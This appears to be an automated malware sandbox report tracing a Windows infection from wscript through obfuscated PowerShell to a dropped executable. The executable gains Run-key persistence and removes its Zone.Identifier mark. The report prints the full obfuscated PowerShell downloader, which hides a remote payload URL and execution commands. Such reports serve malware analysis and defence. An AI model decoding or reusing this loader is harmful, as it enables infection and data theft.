            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: cryptdlg.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msoert2.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msftedit.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: explorerframe.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Binary string: qm.Core.pdb7 source: powershell.exe, 0000000D.00000002.1839791361.00000000082CF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1836814367.0000000007366000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb_ source: powershell.exe, 0000000D.00000002.1832644121.0000000002D14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 0000000D.00000002.1832644121.0000000002D14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000D.00000002.1839791361.00000000082BA000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1832644121.0000000002D14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wab.pdbGCTL source: newfile.exe, 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, newfile.exe, 00000018.00000002.2051745191.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, newfile.exe.18.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.1832644121.0000000002D14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wab.pdb source: newfile.exe, newfile.exe, 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, newfile.exe, 00000018.00000002.2051745191.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, newfile.exe.18.dr

            Data Obfuscation

            barindex
            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("POWERSHELL "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Vale", "0")
            Source: Yara match | File source: 0000000D.00000002.1847193868.000000000ACC4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.1846945449.0000000009760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.1835301736.00000000059E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2049632681.000002259006D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Blokerklringernes)$global:Philomythic = [System.Text.Encoding]::ASCII.GetString($Farrieries)$global:Konkurreret=$Philomythic.substring(298105,28500)<#Nonreusable Federating Spytslikk
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Survive $Afkriminaliseringen $Fodermester), (Humrs @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Landsbyens = [AppDomain]::CurrentDomain.GetAssemblies()$
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Greenhead)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Proselyting, $false).DefineType($Friskheden, $N
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Blokerklringernes)$global:Philomythic = [System.Text.Encoding]::ASCII.GetString($Farrieries)$global:Konkurreret=$Philomythic.substring(298105,28500)<#Nonreusable Federating Spytslikk
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. 
hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl 
BeebgSp,eanordknibuld nxan
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. 
hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl 
BeebgSp,eanordknibuld nxan
            Source: newfile.exe.18.dr | Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
            Source: newfile.exe.18.dr | Static PE information: section name: .didat
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FF8883E6F87 push esp; retf 5_2_00007FF8883E6F88
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_07500638 push eax; mov dword ptr [esp], ecx 13_2_07500AC4
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Code function: 22_2_005F13F8 pushfd ; retf 22_2_005F13F9
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Code function: 22_2_005F376D push ecx; ret 22_2_005F3780
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Users\user\AppData\Roaming\newfile\newfile.exe
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfile

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\newfile\newfile.exe:Zone.Identifier read attributes | delete
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
